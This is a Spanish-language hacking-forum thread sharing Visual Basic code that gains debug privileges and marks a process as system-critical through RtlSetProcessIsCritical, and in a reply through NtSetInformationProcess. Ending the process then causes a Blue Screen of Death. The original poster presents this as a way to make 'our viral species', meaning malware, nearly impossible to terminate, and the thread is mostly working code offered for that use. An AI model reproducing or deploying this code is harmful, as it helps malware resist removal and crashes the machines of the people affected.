API RtlSetProcessIsCritical

Iniciado por XcryptOR, 11 Noviembre 2008, 23:41 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

XcryptOR

11 Noviembre 2008, 23:41 PM Ultima modificación: 15 Noviembre 2008, 02:10 AM por XcryptOR
Bueno este code hace uso de un API nativa de NTDLL.dll la cual setea nuestro proceso como un proceso critico del sistema al igual que winlogon o csrss, bueno el resultado de terminar nuestro proceso dara como resultado la BSOD (Blue Screen Of Death) de windows, espero les sea de utilidad, aplicandolo a nuestra especie viral haria que nuestro proceso no se pudiera terminar. casi interminable.

Codigo del Form:

Código (vb) [Seleccionar]

'*************************************************************************
'*************************************************************************
' Uso de RtlSetProcessIsCritical para setear nuestro proceso, como proceso
' critico del sistema: del mismo modo que csrss.exe o winlogon
' XcryptOR - Made In Colombia
'**************************************************************************
'*************************************************************************
Private Sub Form_Load()
On Error Resume Next
ObtenerPrivilegios SE_DEBUG_NAME ' obtiene privilegios de Debugeo
Call RtlSetProcessIsCritical(0, 0, 1) ' setea nuestro proceso como Proceso Critico
End Sub


Codigo Modulo:

Código (vb) [Seleccionar]

Option Explicit

Private Const ANYSIZE_ARRAY = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2

Private Type LUID
    LowPart As Long
    HighPart As Long
End Type
Private Type LUID_AND_ATTRIBUTES
        pLuid As LUID
        Attributes As Long
End Type
Private Type TOKEN_PRIVILEGES
    PrivilegeCount As Long
    Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type


Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long



Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege"


Public Declare Function RtlSetProcessIsCritical Lib "ntdll.dll" (ByVal NewValue As Boolean, ByVal OldValue As Boolean, ByVal WinLogon As Boolean)

Public Function ObtenerPrivilegios(ByVal privilegio As String) As Long

Dim lpLUID As LUID
Dim lpToken As TOKEN_PRIVILEGES
Dim lpAntToken As TOKEN_PRIVILEGES
Dim hToken As Long
Dim hProcess As Long
Dim res As Long

hProcess = GetCurrentProcess()
res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
If res = 0 Then
    Exit Function
End If
res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
If res = 0 Then
    Exit Function
End If
With lpToken
    .PrivilegeCount = 1
    .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
    .Privileges(0).pLuid = lpLUID
End With

res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
If res = 0 Then
    Exit Function
End If
ObtenerPrivilegios = res
End Function


saludos


carlitrosss6

#1
6 Junio 2009, 03:57 AM
Funciona de maravilla,pero còmo se podrìa revertir esto?Es decir,quitarle el privilegio de "Critico" al proceso?

Saludos!
Arriba Mèxico!!

XcryptOR

#2
6 Junio 2009, 04:10 AM Ultima modificación: 6 Junio 2009, 04:14 AM por XcryptOR
sabes esta api no es reversible, deberias probar este code que hizo SqUeEzEr, que es similar al mio, aqui te lo dejo, espero te sea de utilidad.

Código (vb) [Seleccionar]
Public Function MakeCritical(Phandle As Long, Value As Boolean)

si le asignas verdadero sera un proceso critico y para revertirlo llama a la funcion con el valor false. es un muy buen uso del API NtSetInformationProcess, puedes hacer un hook al cierre del sistema para hacer que tu proceso se vuelva No Critico al cierre de windows.

saludos

Código (vb) [Seleccionar]
'Native api NtSetInformationProcess by SqUeEzEr
Option Explicit
Private Const ANYSIZE_ARRAY = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2

Private Type LUID
   LowPart As Long
   HighPart As Long
End Type
Private Type LUID_AND_ATTRIBUTES
       pLuid As LUID
       Attributes As Long
End Type
Private Type TOKEN_PRIVILEGES
   PrivilegeCount As Long
   Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type


Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long


Public Const SE_CREATE_TOKEN_NAME As String = "SeCreateTokenPrivilege"
Public Const SE_ASSIGNPRIMARYTOKEN_NAME As String = "SeAssignPrimaryTokenPrivilege"
Public Const SE_LOCK_MEMORY_NAME As String = "SeLockMemoryPrivilege"
Public Const SE_INCREASE_QUOTA_NAME As String = "SeIncreaseQuotaPrivilege"
Public Const SE_UNSOLICITED_INPUT_NAME As String = "SeUnsolicitedInputPrivilege"
Public Const SE_MACHINE_ACCOUNT_NAME As String = "SeMachineAccountPrivilege"
Public Const SE_TCB_NAME As String = "SeTcbPrivilege"
Public Const SE_SECURITY_NAME As String = "SeSecurityPrivilege"
Public Const SE_TAKE_OWNERSHIP_NAME As String = "SeTakeOwnershipPrivilege"
Public Const SE_LOAD_DRIVER_NAME As String = "SeLoadDriverPrivilege"
Public Const SE_SYSTEM_PROFILE_NAME As String = "SeSystemProfilePrivilege"
Public Const SE_SYSTEMTIME_NAME As String = "SeSystemtimePrivilege"
Public Const SE_PROF_SINGLE_PROCESS_NAME As String = "SeProfileSingleProcessPrivilege"
Public Const SE_INC_BASE_PRIORITY_NAME As String = "SeIncreaseBasePriorityPrivilege"
Public Const SE_CREATE_PAGEFILE_NAME As String = "SeCreatePagefilePrivilege"
Public Const SE_CREATE_PERMANENT_NAME As String = "SeCreatePermanentPrivilege"
Public Const SE_BACKUP_NAME As String = "SeBackupPrivilege"
Public Const SE_RESTORE_NAME As String = "SeRestorePrivilege"
Public Const SE_SHUTDOWN_NAME As String = "SeShutdownPrivilege"
Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege"
Public Const SE_AUDIT_NAME As String = "SeAuditPrivilege"
Public Const SE_SYSTEM_ENVIRONMENT_NAME As String = "SeSystemEnvironmentPrivilege"
Public Const SE_CHANGE_NOTIFY_NAME As String = "SeChangeNotifyPrivilege"
Public Const SE_REMOTE_SHUTDOWN_NAME As String = "SeRemoteShutdownPrivilege"
'THE api we need!
Private Declare Function NtSetInformationProcess Lib "ntdll.dll" (ByVal hProcess As Integer, ByVal ProcessInformationClass As Integer, ByVal ProcessInformation As Long, ByVal ProcessInformationLength As Integer) As Integer
Private Const ProcessBreakOnTermination As Long = 29
'The api we need!
Public Function MakeCritical(Phandle As Long, Value As Boolean)
GetPrivilegs SE_DEBUG_NAME
Dim ProcessInfo As Long

If Value = True Then
   ProcessInfo = 29&
Else
   ProcessInfo = 0&
End If

Call NtSetInformationProcess(Phandle, ProcessBreakOnTermination, VarPtr(ProcessInfo), Len(ProcessInfo))
End Function
Public Function GetPrivilegs(ByVal privilegio As String) As Long

Dim lpLUID As LUID
Dim lpToken As TOKEN_PRIVILEGES
Dim lpAntToken As TOKEN_PRIVILEGES
Dim hToken As Long
Dim hProcess As Long
Dim res As Long

hProcess = GetCurrentProcess()
res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
If res = 0 Then
   Exit Function
End If
res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
If res = 0 Then
   Exit Function
End If
With lpToken
   .PrivilegeCount = 1
   .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
   .Privileges(0).pLuid = lpLUID
End With

res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
If res = 0 Then
   Exit Function
End If
GetPrivilegs = res
End Function






carlitrosss6

#3
6 Junio 2009, 04:21 AM
Barbaro   ;-)  Gracias XcryptOR!!
Arriba Mèxico!!

Freeze.

#4
6 Junio 2009, 04:31 AM
Creo que la función ObtenerPrivilegios es de Karcrack... Si es asi deberia tener un reconocimiento... ;)

Karcrack

#5
6 Junio 2009, 12:30 PM
Cita de: Freeze. en  6 Junio 2009, 04:31 AM
Creo que la función ObtenerPrivilegios es de Karcrack... Si es asi deberia tener un reconocimiento... ;)
No, no es mia... si no recuerdo mal es de Nhaalclkiemr lastima que no haya vuelto a aparecer :-(

(PGP ID)

Freeze.

#6
6 Junio 2009, 22:27 PM
Si, lastima.. Es una gran persona y un excelente programador. :D

¿No será que sigue viviendo por ahí a escondidas?
Imprimir
Ir Arriba Páginas1
Acciones del Usuario